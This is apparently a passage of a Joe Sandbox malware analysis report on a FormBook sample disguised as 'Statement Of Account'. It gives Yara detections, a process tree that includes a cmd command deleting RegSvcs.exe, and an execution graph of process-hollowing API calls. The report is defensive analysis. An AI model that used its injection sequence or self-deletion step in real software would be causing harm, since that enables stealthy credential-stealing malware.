                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:16
                                                                                          Start time:18:43:05
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
                                                                                          Imagebase:0x860000
                                                                                          File size:86'528 bytes
                                                                                          MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:17
                                                                                          Start time:18:43:09
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:18
                                                                                          Start time:18:43:09
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:10.5%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:166
                                                                                            Total number of Limit Nodes:5
                                                                                            execution_graph 24786 7a2ca63 24787 7a2ce3f 24786->24787 24792 7a2efc0 24787->24792 24806 7a2efb8 24787->24806 24820 7a2f026 24787->24820 24788 7a2ce4f 24793 7a2efda 24792->24793 24794 7a2efe2 24793->24794 24835 7a2f788 24793->24835 24840 7a2fa8b 24793->24840 24844 7a2f76b 24793->24844 24849 7a2f841 24793->24849 24854 7a2f401 24793->24854 24859 7a2f503 24793->24859 24864 7a2f71e 24793->24864 24869 7a2f8d7 24793->24869 24874 7a2f66e 24793->24874 24878 7a2f8e9 24793->24878 24883 7a2f469 24793->24883 24794->24788 24807 7a2efda 24806->24807 24808 7a2f503 2 API calls 24807->24808 24809 7a2f401 2 API calls 24807->24809 24810 7a2f841 2 API calls 24807->24810 24811 7a2f76b 2 API calls 24807->24811 24812 7a2fa8b 2 API calls 24807->24812 24813 7a2f788 2 API calls 24807->24813 24814 7a2f469 2 API calls 24807->24814 24815 7a2f8e9 2 API calls 24807->24815 24816 7a2f66e 2 API calls 24807->24816 24817 7a2efe2 24807->24817 24818 7a2f8d7 2 API calls 24807->24818 24819 7a2f71e 2 API calls 24807->24819 24808->24817 24809->24817 24810->24817 24811->24817 24812->24817 24813->24817 24814->24817 24815->24817 24816->24817 24817->24788 24818->24817 24819->24817 24821 7a2efb4 24820->24821 24823 7a2f029 24820->24823 24822 7a2efe2 24821->24822 24824 7a2f503 2 API calls 24821->24824 24825 7a2f401 2 API calls 24821->24825 24826 7a2f841 2 API calls 24821->24826 24827 7a2f76b 2 API calls 24821->24827 24828 7a2fa8b 2 API calls 24821->24828 24829 7a2f788 2 API calls 24821->24829 24830 7a2f469 2 API calls 24821->24830 24831 7a2f8e9 2 API calls 24821->24831 24832 7a2f66e 2 API calls 24821->24832 24833 7a2f8d7 2 API calls 24821->24833 24834 7a2f71e 2 API calls 24821->24834 24822->24788 24823->24788 24824->24822 24825->24822 24826->24822 24827->24822 24828->24822 24829->24822 24830->24822 24831->24822 24832->24822 24833->24822 24834->24822 24836 7a2f7ab 24835->24836 24888 7a2c390 24836->24888 24892 7a2c38c 24836->24892 24837 7a2fa6c 24896 7a2c2d0 24840->24896 24900 7a2c2cc 24840->24900 24841 7a2faac 24845 7a2f778 24844->24845 24847 7a2c390 WriteProcessMemory 24845->24847 24848 7a2c38c WriteProcessMemory 24845->24848 24846 7a2f921 24847->24846 24848->24846 24904 7a2bdc0 24849->24904 24908 7a2bdbb 24849->24908 24850 7a2f597 24850->24849 24851 7a2f4dd 24850->24851 24851->24794 24855 7a2f40f 24854->24855 24912 7a2c618 24855->24912 24916 7a2c60c 24855->24916 24860 7a2f87a 24859->24860 24862 7a2c390 WriteProcessMemory 24860->24862 24863 7a2c38c WriteProcessMemory 24860->24863 24861 7a2fb48 24861->24794 24862->24861 24863->24861 24865 7a2fc7c 24864->24865 24920 7a2c480 24865->24920 24924 7a2c47c 24865->24924 24866 7a2fb7e 24866->24794 24870 7a2f597 24869->24870 24871 7a2f4dd 24870->24871 24872 7a2bdc0 Wow64SetThreadContext 24870->24872 24873 7a2bdbb Wow64SetThreadContext 24870->24873 24871->24794 24872->24870 24873->24870 24876 7a2bdc0 Wow64SetThreadContext 24874->24876 24877 7a2bdbb Wow64SetThreadContext 24874->24877 24875 7a2f688 24875->24794 24876->24875 24877->24875 24879 7a2f8ef 24878->24879 24881 7a2c390 WriteProcessMemory 24879->24881 24882 7a2c38c WriteProcessMemory 24879->24882 24880 7a2f921 24881->24880 24882->24880 24884 7a2f405 24883->24884 24886 7a2c618 CreateProcessA 24884->24886 24887 7a2c60c CreateProcessA 24884->24887 24885 7a2f4b2 24886->24885 24887->24885 24889 7a2c3d8 WriteProcessMemory 24888->24889 24891 7a2c42f 24889->24891 24891->24837 24893 7a2c3d8 WriteProcessMemory 24892->24893 24895 7a2c42f 24893->24895 24895->24837 24897 7a2c310 VirtualAllocEx 24896->24897 24899 7a2c34d 24897->24899 24899->24841 24901 7a2c310 VirtualAllocEx 24900->24901 24903 7a2c34d 24901->24903 24903->24841 24905 7a2be05 Wow64SetThreadContext 24904->24905 24907 7a2be4d 24905->24907 24907->24850 24909 7a2be05 Wow64SetThreadContext 24908->24909 24911 7a2be4d 24909->24911 24911->24850 24913 7a2c6a1 24912->24913 24913->24913 24914 7a2c806 CreateProcessA 24913->24914 24915 7a2c863 24914->24915 24917 7a2c610 CreateProcessA 24916->24917 24919 7a2c863 24917->24919 24919->24919 24921 7a2c4cb ReadProcessMemory 24920->24921 24923 7a2c50f 24921->24923 24923->24866 24925 7a2c4cb ReadProcessMemory 24924->24925 24927 7a2c50f 24925->24927 24927->24866 24928 14a4668 24929 14a467a 24928->24929 24930 14a4686 24929->24930 24932 14a4778 24929->24932 24933 14a479d 24932->24933 24937 14a4878 24933->24937 24941 14a4888 24933->24941 24938 14a48af 24937->24938 24939 14a498c 24938->24939 24945 14a449c 24938->24945 24943 14a48af 24941->24943 24942 14a498c 24942->24942 24943->24942 24944 14a449c CreateActCtxA 24943->24944 24944->24942 24946 14a5918 CreateActCtxA 24945->24946 24948 14a59db 24946->24948 24953 14ad118 24954 14ad15e GetCurrentProcess 24953->24954 24956 14ad1a9 24954->24956 24957 14ad1b0 GetCurrentThread 24954->24957 24956->24957 24958 14ad1ed GetCurrentProcess 24957->24958 24959 14ad1e6 24957->24959 24960 14ad223 24958->24960 24959->24958 24961 14ad24b GetCurrentThreadId 24960->24961 24962 14ad27c 24961->24962 24963 7a2bd10 24964 7a2bd50 ResumeThread 24963->24964 24966 7a2bd81 24964->24966 24967 14aad98 24968 14aad99 24967->24968 24972 14aae7f 24968->24972 24980 14aae90 24968->24980 24969 14aada7 24973 14aae90 24972->24973 24974 14aaec4 24973->24974 24988 14ab118 24973->24988 24992 14ab128 24973->24992 24974->24969 24975 14aaebc 24975->24974 24976 14ab0c8 GetModuleHandleW 24975->24976 24977 14ab0f5 24976->24977 24977->24969 24981 14aae91 24980->24981 24983 14aaec4 24981->24983 24986 14ab118 LoadLibraryExW 24981->24986 24987 14ab128 LoadLibraryExW 24981->24987 24982 14aaebc 24982->24983 24984 14ab0c8 GetModuleHandleW 24982->24984 24983->24969 24985 14ab0f5 24984->24985 24985->24969 24986->24982 24987->24982 24989 14ab13c 24988->24989 24991 14ab161 24989->24991 24996 14aa8d0 24989->24996 24991->24975 24993 14ab13c 24992->24993 24994 14aa8d0 LoadLibraryExW 24993->24994 24995 14ab161 24993->24995 24994->24995 24995->24975 24997 14ab308 LoadLibraryExW 24996->24997 24999 14ab381 24997->24999 24999->24991 24949 14ad421 24950 14ad3e4 DuplicateHandle 24949->24950 24952 14ad42a 24949->24952 24951 14ad3f6 24950->24951

                                                                                            Executed Functions

                                                                                            Function 014AD108 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 296 14ad108-14ad1a7 GetCurrentProcess 300 14ad1a9-14ad1af 296->300 301 14ad1b0-14ad1e4 GetCurrentThread 296->301 300->301 302 14ad1ed-14ad221 GetCurrentProcess 301->302 303 14ad1e6-14ad1ec 301->303 304 14ad22a-14ad245 call 14ad2e9 302->304 305 14ad223-14ad229 302->305 303->302 309 14ad24b-14ad27a GetCurrentThreadId 304->309 305->304 310 14ad27c-14ad282 309->310 311 14ad283-14ad2e5 309->311 310->311
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014AD196
                                                                                            • GetCurrentThread.KERNEL32 ref: 014AD1D3
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014AD210
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 014AD269
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 70733290f3b6b79bbc6debcc30691fb6b9b1a36882d9885e04b635941195de14
                                                                                            • Instruction ID: 9ee6c41c02a9aabef3d2f19f3158c39dd99eadbfce6c9b812184011795ce66b5
                                                                                            • Opcode Fuzzy Hash: 70733290f3b6b79bbc6debcc30691fb6b9b1a36882d9885e04b635941195de14
                                                                                            • Instruction Fuzzy Hash: 135144B0D002498FDB14DFAAD548BDEBFF1BF88314F24846AE059A7360DB349984CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014AD118 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 318 14ad118-14ad1a7 GetCurrentProcess 322 14ad1a9-14ad1af 318->322 323 14ad1b0-14ad1e4 GetCurrentThread 318->323 322->323 324 14ad1ed-14ad221 GetCurrentProcess 323->324 325 14ad1e6-14ad1ec 323->325 326 14ad22a-14ad245 call 14ad2e9 324->326 327 14ad223-14ad229 324->327 325->324 331 14ad24b-14ad27a GetCurrentThreadId 326->331 327->326 332 14ad27c-14ad282 331->332 333 14ad283-14ad2e5 331->333 332->333
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014AD196
                                                                                            • GetCurrentThread.KERNEL32 ref: 014AD1D3
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014AD210
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 014AD269
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 463cd38d1572e0e01d84211b369b4e25ea3ef283544dd0dfafdf5955d32e174a
                                                                                            • Instruction ID: 5277c8114009088976ad93a01c591b9951682d335224bcd6eeae6f96f9e1a805
                                                                                            • Opcode Fuzzy Hash: 463cd38d1572e0e01d84211b369b4e25ea3ef283544dd0dfafdf5955d32e174a
                                                                                            • Instruction Fuzzy Hash: 8E5124B0D002499FDB14DFAAD548B9EBBF1BB88314F20845AE459A7360DB34A984CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2C60C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 478 7a2c60c-7a2c60e 479 7a2c610 478->479 480 7a2c611-7a2c6ad 478->480 479->480 482 7a2c6e6-7a2c706 480->482 483 7a2c6af-7a2c6b9 480->483 490 7a2c708-7a2c712 482->490 491 7a2c73f-7a2c76e 482->491 483->482 484 7a2c6bb-7a2c6bd 483->484 485 7a2c6e0-7a2c6e3 484->485 486 7a2c6bf-7a2c6c9 484->486 485->482 488 7a2c6cb 486->488 489 7a2c6cd-7a2c6dc 486->489 488->489 489->489 493 7a2c6de 489->493 490->491 492 7a2c714-7a2c716 490->492 499 7a2c770-7a2c77a 491->499 500 7a2c7a7-7a2c861 CreateProcessA 491->500 494 7a2c718-7a2c722 492->494 495 7a2c739-7a2c73c 492->495 493->485 497 7a2c726-7a2c735 494->497 498 7a2c724 494->498 495->491 497->497 501 7a2c737 497->501 498->497 499->500 502 7a2c77c-7a2c77e 499->502 511 7a2c863-7a2c869 500->511 512 7a2c86a-7a2c8f0 500->512 501->495 504 7a2c780-7a2c78a 502->504 505 7a2c7a1-7a2c7a4 502->505 506 7a2c78e-7a2c79d 504->506 507 7a2c78c 504->507 505->500 506->506 509 7a2c79f 506->509 507->506 509->505 511->512 522 7a2c8f2-7a2c8f6 512->522 523 7a2c900-7a2c904 512->523 522->523 524 7a2c8f8 522->524 525 7a2c906-7a2c90a 523->525 526 7a2c914-7a2c918 523->526 524->523 525->526 529 7a2c90c 525->529 527 7a2c91a-7a2c91e 526->527 528 7a2c928-7a2c92c 526->528 527->528 530 7a2c920 527->530 531 7a2c93e-7a2c945 528->531 532 7a2c92e-7a2c934 528->532 529->526 530->528 533 7a2c947-7a2c956 531->533 534 7a2c95c 531->534 532->531 533->534 536 7a2c95d 534->536 536->536
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07A2C84E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 389c69e7b2261ac7028d6d32f8a52785a79329a83ddf38eb69efd239c6f9b8c9
                                                                                            • Instruction ID: 322438e9fe6ccefd3f6201cd7261617b616841c613de2737d4fd038b932a0f82
                                                                                            • Opcode Fuzzy Hash: 389c69e7b2261ac7028d6d32f8a52785a79329a83ddf38eb69efd239c6f9b8c9
                                                                                            • Instruction Fuzzy Hash: 5AA181B1D0022ADFDB14DF68CC407DDBBB2BF44310F1481AAE859A7250DB749986DFA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07A2C618 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 537 7a2c618-7a2c6ad 539 7a2c6e6-7a2c706 537->539 540 7a2c6af-7a2c6b9 537->540 547 7a2c708-7a2c712 539->547 548 7a2c73f-7a2c76e 539->548 540->539 541 7a2c6bb-7a2c6bd 540->541 542 7a2c6e0-7a2c6e3 541->542 543 7a2c6bf-7a2c6c9 541->543 542->539 545 7a2c6cb 543->545 546 7a2c6cd-7a2c6dc 543->546 545->546 546->546 550 7a2c6de 546->550 547->548 549 7a2c714-7a2c716 547->549 556 7a2c770-7a2c77a 548->556 557 7a2c7a7-7a2c861 CreateProcessA 548->557 551 7a2c718-7a2c722 549->551 552 7a2c739-7a2c73c 549->552 550->542 554 7a2c726-7a2c735 551->554 555 7a2c724 551->555 552->548 554->554 558 7a2c737 554->558 555->554 556->557 559 7a2c77c-7a2c77e 556->559 568 7a2c863-7a2c869 557->568 569 7a2c86a-7a2c8f0 557->569 558->552 561 7a2c780-7a2c78a 559->561 562 7a2c7a1-7a2c7a4 559->562 563 7a2c78e-7a2c79d 561->563 564 7a2c78c 561->564 562->557 563->563 566 7a2c79f 563->566 564->563 566->562 568->569 579 7a2c8f2-7a2c8f6 569->579 580 7a2c900-7a2c904 569->580 579->580 581 7a2c8f8 579->581 582 7a2c906-7a2c90a 580->582 583 7a2c914-7a2c918 580->583 581->580 582->583 586 7a2c90c 582->586 584 7a2c91a-7a2c91e 583->584 585 7a2c928-7a2c92c 583->585 584->585 587 7a2c920 584->587 588 7a2c93e-7a2c945 585->588 589 7a2c92e-7a2c934 585->589 586->583 587->585 590 7a2c947-7a2c956 588->590 591 7a2c95c 588->591 589->588 590->591 593 7a2c95d 591->593 593->593
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07A2C84E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 7dd8d3eff03ecddca8d86b4ca967ad7572912167f72a6d97a16b6ae66ebb807b
                                                                                            • Instruction ID: c9372da22d43079bf97b7b7f4a34cbb4b1855d8205390596d9bc15b7c7a56f93
                                                                                            • Opcode Fuzzy Hash: 7dd8d3eff03ecddca8d86b4ca967ad7572912167f72a6d97a16b6ae66ebb807b
                                                                                            • Instruction Fuzzy Hash: E59182B1D0022ADFDB10DF69C8407DDBBB1BF44314F1481AAE859A7250DB749986DFA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014AAE90 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 594 14aae90-14aae9f 596 14aaecb-14aaecf 594->596 597 14aaea1-14aaeae call 14a9898 594->597 599 14aaee3-14aaf24 596->599 600 14aaed1-14aaedb 596->600 604 14aaeb0 597->604 605 14aaec4 597->605 606 14aaf31-14aaf3f 599->606 607 14aaf26-14aaf2e 599->607 600->599 650 14aaeb6 call 14ab118 604->650 651 14aaeb6 call 14ab128 604->651 605->596 608 14aaf63-14aaf65 606->608 609 14aaf41-14aaf46 606->609 607->606 611 14aaf68-14aaf6f 608->611 612 14aaf48-14aaf4f call 14aa874 609->612 613 14aaf51 609->613 610 14aaebc-14aaebe 610->605 614 14ab000-14ab0c0 610->614 617 14aaf7c-14aaf83 611->617 618 14aaf71-14aaf79 611->618 615 14aaf53-14aaf61 612->615 613->615 645 14ab0c8-14ab0f3 GetModuleHandleW 614->645 646 14ab0c2-14ab0c5 614->646 615->611 621 14aaf90-14aaf92 call 14aa884 617->621 622 14aaf85-14aaf8d 617->622 618->617 624 14aaf97-14aaf99 621->624 622->621 626 14aaf9b-14aafa3 624->626 627 14aafa6-14aafab 624->627 626->627 629 14aafc9-14aafd6 627->629 630 14aafad-14aafb4 627->630 636 14aafd8-14aaff6 629->636 637 14aaff9-14aafff 629->637 630->629 631 14aafb6-14aafc6 call 14aa894 call 14aa8a4 630->631 631->629 636->637 647 14ab0fc-14ab110 645->647 648 14ab0f5-14ab0fb 645->648 646->645 648->647 650->610 651->610
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 014AB0E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 681d9950e28a485abe21639ff030f6f0d690000cce415b46ddcc504109432c43
                                                                                            • Instruction ID: 8a36b89bacff1115b46e40803ccbad2f2caba1956e3bdcf8e5be059a28efd178
                                                                                            • Opcode Fuzzy Hash: 681d9950e28a485abe21639ff030f6f0d690000cce415b46ddcc504109432c43
                                                                                            • Instruction Fuzzy Hash: 137145B0A00B058FD728DF2AC15075ABBF5FF58204F50892EE08AD7B60DB75E849CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014A590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 668 14a590c-14a5914 669 14a591c-14a59d9 CreateActCtxA 668->669 671 14a59db-14a59e1 669->671 672 14a59e2-14a5a3c 669->672 671->672 679 14a5a4b-14a5a4f 672->679 680 14a5a3e-14a5a41 672->680 681 14a5a60 679->681 682 14a5a51-14a5a5d 679->682 680->679 684 14a5a61 681->684 682->681 684->684
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 014A59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 9d697bc96e53352bb12ac6564f1120de80cb1de4f62c0eba56493b0904411cc3
                                                                                            • Instruction ID: ed9ab1eb7db091a8257cb74cba66868a5ab86a582424ed0bbc5349d386fdcb93
                                                                                            • Opcode Fuzzy Hash: 9d697bc96e53352bb12ac6564f1120de80cb1de4f62c0eba56493b0904411cc3
                                                                                            • Instruction Fuzzy Hash: 2E41F1B0D00719CEDB24CFA9C9847CEBBB5BF49304F6480AAD408AB265DB756945CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014A449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 685 14a449c-14a59d9 CreateActCtxA 688 14a59db-14a59e1 685->688 689 14a59e2-14a5a3c 685->689 688->689 696 14a5a4b-14a5a4f 689->696 697 14a5a3e-14a5a41 689->697 698 14a5a60 696->698 699 14a5a51-14a5a5d 696->699 697->696 701 14a5a61 698->701 699->698 701->701
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 014A59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: b2e23bc5f9dad09aabe3b14241e908407877a568b49a536fc19a72f4ba8fa95a
                                                                                            • Instruction ID: 163221971419321911273f235995bd3ca7add49a8a4ca822d63d57a0b8ce28ed
                                                                                            • Opcode Fuzzy Hash: b2e23bc5f9dad09aabe3b14241e908407877a568b49a536fc19a72f4ba8fa95a
                                                                                            • Instruction Fuzzy Hash: E041EFB0D00719CBDB24DFA9C984B9EBBB5BF49304F60806AD408AB261DBB56945CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014AD421 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 702 14ad421-14ad428 703 14ad42a-14ad54e 702->703 704 14ad3e4-14ad3f4 DuplicateHandle 702->704 705 14ad3fd-14ad41a 704->705 706 14ad3f6-14ad3fc 704->706 706->705
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 8fcaa6ce5e042f60d22d9f6d2f999d9da1b439e08d85a981f3314ec026672651
